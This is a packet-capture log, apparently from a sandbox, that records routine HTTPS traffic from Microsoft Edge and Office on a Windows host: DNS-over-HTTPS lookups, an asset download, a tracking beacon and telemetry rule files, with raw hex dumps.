2024-11-11 23:06:27 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 04 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 0e 0f 00 2d 12 65 64 67 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 0b 64 75 61 6c 2d 61 2d 30 30 33 36 08 61 2d 6d 73 65 64 67 65 03 6e 65 74 00 c0 30 00 05 00 01 00 00 00 3b 00 02 c0 43 c0 43 00 01 00 01 00 00 00 3b 00 04 cc 4f c5 ef c0 43 00 01 00 01 00 00 00 3b 00 04 0d 6b 15 ef 00 00 29 04 d0 00 00 00 00 01 3e 00 0c 01 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcom-edge-microsoft-comdual-a-0036a-msedgenet0;CC;OC;k)>:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	49849	172.64.41.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 23:06:27 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcomA)QM
2024-11-11 23:06:27 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e11eed2aa287ca8-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 23:06:27 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 01 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0d a6 00 2d 12 65 64 67 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 0b 64 75 61 6c 2d 61 2d 30 30 33 36 08 61 2d 6d 73 65 64 67 65 03 6e 65 74 00 c0 4f 00 06 00 01 00 00 00 86 00 23 03 6e 73 31 c0 4f 06 6d 73 6e 68 73 74 c0 11 78 2b 22 e5 00 00 07 08 00 00 03 84 00 24 ea 00 00 00 00 f0 00 00 29 04 d0 00 00 00 00 01 3d 00 0c 01 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcomA-edge-microsoft-comdual-a-0036a-msedgenetO#ns1Omsnhstx+"$)=9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	49847	13.107.246.40	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:27 UTC	577	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: 2bcc90d3-901e-004b-1766-34599d000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T230627Z-174f7845968nnm4mhC1EWR1rn400000005f000000000p1w1 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	15807	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-11-11 23:06:27 UTC	16384	IN	Data Raw: 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c Data Ascii: u&U\h\|[T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5QafAp
2024-11-11 23:06:27 UTC	16384	IN	Data Raw: b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d Data Ascii: ,(T$&O7gkD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35QTB-
2024-11-11 23:06:27 UTC	16384	IN	Data Raw: 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 Data Ascii: B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM]z_]y]DZgtc>qDX\\M,SqP
2024-11-11 23:06:27 UTC	16384	IN	Data Raw: c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e Data Ascii: kp4k@?lk/IyMR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~Cl.V
2024-11-11 23:06:27 UTC	16384	IN	Data Raw: 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 Data Ascii: {M1eIwyfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\
2024-11-11 23:06:27 UTC	16384	IN	Data Raw: b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 Data Ascii: O n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>Jc
2024-11-11 23:06:28 UTC	16384	IN	Data Raw: e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 Data Ascii: ,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
2024-11-11 23:06:28 UTC	16384	IN	Data Raw: 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 Data Ascii: 4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vHN@
2024-11-11 23:06:28 UTC	16384	IN	Data Raw: 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 Data Ascii: VG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%S^?`>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	49856	108.139.47.33	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	1012	OUT	GET /b2?rn=1731366386050&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=11FAD531813A66492642C0058058675E&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=1296350c4b632a8fa60522d1731366387; XID=1296350c4b632a8fa60522d1731366387
2024-11-11 23:06:27 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Mon, 11 Nov 2024 23:06:27 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 043cf9310ff19c0e58a0b6e76877f570.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK50-P1 X-Amz-Cf-Id: MVunLPtxd0tyQxAdlsACVqyiWyTbVO7jivmU5TH-NcbKbsZrO0A-lw==

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.5	49853	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: bdd7469a-701e-0053-5fd5-333a0a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230627Z-174f7845968glpgnhC1EWR7uec00000005n000000000uhvh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.5	49854	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: b80249cf-101e-0017-2bd5-3347c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230627Z-174f7845968jrjrxhC1EWRmmrs00000005rg00000000c5mh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.5	49851	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 63eb2845-501e-00a3-1dd5-33c0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230627Z-174f78459685726chC1EWRsnbg00000005m000000000k0gy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 